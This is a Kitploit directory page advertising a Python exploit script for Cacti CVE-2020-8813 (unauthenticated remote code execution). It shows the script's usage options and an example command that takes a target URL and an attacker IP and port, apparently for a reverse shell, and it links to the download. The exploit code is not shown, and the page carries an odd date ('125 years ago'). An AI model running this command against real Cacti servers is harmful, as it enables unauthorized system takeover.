Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Cacti-CVE-2020-8813 — Python exploit script targeting Cacti CVE-2020-8813 for unauthenticated remote code execution via crafted HTTP requests. | Kitploit
Tools/GitHubGitHub/0xm4ud/cacti-cve-2020-8813
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHub0xm4ud/cacti-cve-2020-8813

Cacti-CVE-2020-8813

Python exploit script targeting Cacti CVE-2020-8813 for unauthenticated remote code execution via crafted HTTP requests.

View Repository
125 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Cacti-CVE-2020-8813

root@kitploit:~
Usage: cacti_rce.py [options]

Options:
  -h, --help            show this help message and exit
  -u URL, --url=URL     [ Required ] target URL eg:. http://Cacti/
  -l LHOST, --lhost=LHOST
                        [ Required ] Attacker IP addr
  -p LPORT, --lport=LPORT
                        [ Default 443 ] Attacker IP Port
                        
                        

Example:

root@kitploit:~
python3 cacti_rce.py -u http://CACTI/ -l 192.168.x.x
Download Tool